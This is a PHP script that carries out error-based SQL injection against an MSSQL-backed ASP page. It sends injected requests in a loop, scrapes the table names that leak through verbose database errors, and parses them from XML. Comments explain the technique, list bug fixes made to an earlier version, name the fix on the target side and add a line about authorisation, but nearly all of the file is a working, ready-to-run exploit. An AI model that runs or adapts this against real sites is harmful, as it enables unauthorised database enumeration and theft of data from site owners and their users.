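<?php
declare(strict_types=1);

/*
 * Error-based SQL injection harvester against an MSSQL-backed page.
 *
 * Each request closes the string literal behind `id=1` and appends
 *   and 1= (SELECT convert(int, SUBSTRING(<table list as XML>, $offset, $chunk)))--
 * The target's verbose database error ("... the nvarchar value '...' to data
 * type int.") echoes that window of the table list back inside the HTML, and
 * the regex below scrapes it out. The loop ends on the first window that comes
 * back empty ("type mismatch") or without a scrapable value.
 *
 * What makes this work is also the fix on the target side: `id` is
 * interpolated straight into the query and the raw driver error is printed to
 * the page. Parameterised queries plus generic error pages remove both halves
 * of the channel.
 *
 * Defects fixed relative to the original paste: `$xml` was used before being
 * initialised, the socket was never closed, the response body was truncated
 * at the first blank line inside it, the wrapping <root> element was never
 * closed before parsing, the parser handle was never freed, and the root
 * element itself triggered an undefined-index notice in the output loop.
 *
 * Use only against systems you are explicitly authorised to test.
 */

$host = "www.test.net";
$port = 80;
$chunk = 1990;   // characters of the XML blob requested per round trip

/**
 * Send one injected GET for the window starting at $offset and return the
 * HTTP response body, or null when the TCP connection could not be opened.
 *
 * The payload string is kept byte-for-byte as in the original; only the
 * window start and length are substituted.
 */
function fetch_body(string $host, int $port, int $offset, int $chunk): ?string
{
    $payload = " and 1= (SELECT convert(int,SUBSTRING((SELECT TABLE_NAME AS e FROM information_schema.TABLES FOR XML RAW ('a')),$offset,$chunk)))--";

    // The literal `1'` is deliberately left unencoded; only the payload is.
    $request  = "GET /index.asp?id=1'" . urlencode($payload) . " HTTP/1.0\r\n";
    $request .= "Host: $host\r\n";
    $request .= "Connection: close\r\n\r\n";

    $sock = fsockopen(gethostbyname($host), $port, $errno, $errstr);
    if (!$sock) {
        return null;
    }

    fwrite($sock, $request);

    $raw = '';
    while (!feof($sock)) {
        $line = fgets($sock);
        if ($line === false) {
            break;
        }
        $raw .= $line;
    }
    fclose($sock);

    // Split headers from body once; a blank line *inside* the body must not
    // cut the part we want to scan.
    $parts = explode("\r\n\r\n", $raw, 2);
    return $parts[1] ?? '';
}

$xml = '';

// NOTE(review): T-SQL SUBSTRING counts from 1, so the first window (start 0)
// is believed to be one character short; the windows still abut, because the
// next one starts exactly at $chunk. Confirm against the target's behaviour.
for ($offset = 0; ; $offset += $chunk) {
    $body = fetch_body($host, $port, $offset, $chunk);
    if ($body === null) {
        exit("could not connect to $host:$port\n");
    }

    // Past the end of the blob the convert() no longer fails on a value, so
    // the page reports a plain type mismatch instead of echoing data.
    if (stripos($body, 'type mismatch') !== false) {
        break;
    }

    // Capture the nvarchar value the driver error echoes back. The pattern is
    // unchanged from the original paste.
    $m = [];
    if (!preg_match("@the nvarchar value '(.+?)'*( to data type int\.)*</font>@", $body, $m)) {
        break;
    }

    $xml .= htmlspecialchars_decode($m[1]);
}

// FOR XML RAW ('a') produces a flat run of <a e="..."/> elements; wrap them in
// a root element (and close it) so the parser sees a well-formed document.
$parser = xml_parser_create();
$elements = [];
xml_parse_into_struct($parser, '<root>' . $xml . '</root>', $elements);
xml_parser_free($parser);

// Attribute names are upper-cased by the parser's default case folding, hence
// 'E' for the `e` alias in the query. The <root> element has no attributes, so
// it is skipped rather than tripping an undefined-index notice.
foreach ($elements as $el) {
    if (isset($el['attributes']['E'])) {
        echo $el['attributes']['E'] . "\r\n";
    }
}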